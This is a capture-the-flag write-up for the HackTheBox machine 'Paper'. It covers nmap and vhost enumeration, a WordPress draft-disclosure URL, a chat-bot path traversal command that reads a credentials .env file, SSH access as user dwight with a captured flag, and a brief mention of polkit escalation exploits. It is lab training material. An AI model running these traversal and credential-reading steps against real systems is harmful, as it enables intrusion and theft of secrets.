HacktheBox - Paper
This machine plays a cve that when the machine was released was discovered.
Enumeration
Nmap
In the scan we obtain 3 ports only:
22 –> SSH
80 –> HTTP
443 —> HTTPS
# Nmap 7.91 scan initiated Sat Feb 12 16:31:45 2022 as: nmap -sCV -v -T5 -Pn -oN nmap/scanport.log 10.10.11.143
Warning: 10.10.11.143 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.143
Host is up (0.065s latency).
Not shown: 577 filtered ports, 420 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-07-03T08:52:34
| Not valid after: 2022-07-08T10:32:34
| MD5: 579a 92bd 803c ac47 d49c 5add e44e 4f84
|_SHA-1: 61a2 301f 9e5c 2603 a643 00b5 e5da 5fd5 c175 f3a9
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 16:34:09 2022 -- 1 IP address (1 host up) scanned in 144.47 seconds
Tecnology
Looking at the technologies involved in the machine I see a domain:
- office.paper
Summary: Email[webmaster@example.com], PoweredBy[CentOS], MetaGenerator[HTML Tidy for HTML5 for Linux version 5.7.28], UncommonHeaders[x-backend-server], HTTPServer[CentOS]
[Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9], OpenSSL[1.1.1k], Apache[2.4.37][mod_fcgid/2.3.9], HTML5, X-Backend[office.paper]
Subdomain
We add this to /etc/hosts
- office.paper
- chat.office.paper
- office.htb
gobuster vhost -u http://office.paper -w ~/Documents/Seclists/Discovery/DNS/subdomains-top1million-110000.txt -z -q
Found: chat.office.paper (Status: 200) [Size: 223163]
User Potencial
By looking at the comments we can perhaps draw out possible users:
- Nick
- prisonmike
Here is a hint of a content that has not been deleted
Here we see a vulnerability that allows us to view the draft
https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2
Chat
Seeing this we realize that we need a specific url:
Vuln
http://office.paper/?static=1
Here following how the vulnerability is exploited we would have access to the draft
Register
Here we already have access to the internal chat
http://chat.office.paper/register/8qozr226AhkCHZdyY
Bot Testing (Shell Dwight)
Testing the bot I realize that I can read files from the server, here I found an interesting file which is .env
recyclops file ../../../../../home/dwight/hubot/.env
PrivEsc
With this password we found we can use it as the user dwight:
ssh dwight@10.10.11.143
dwight@10.10.11.143's password:
Activate the web console with: systemctl enable --now cockpit.socket
Last login: Tue Feb 1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$ id
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
[dwight@paper ~]$ clear
[dwight@paper ~]$ ls
bot_restart.sh hubot sales user.txt
[dwight@paper ~]$ cat user.txt
e5e2ef480b8d49dd2dd1be31c1384812
[dwight@paper ~]$
With linpeas I can see an interesting information which is that it has polkit:
Python
We can use this exploit in Python
Bash
We can use this exploit in bash
MACHINE PWNED!!!!!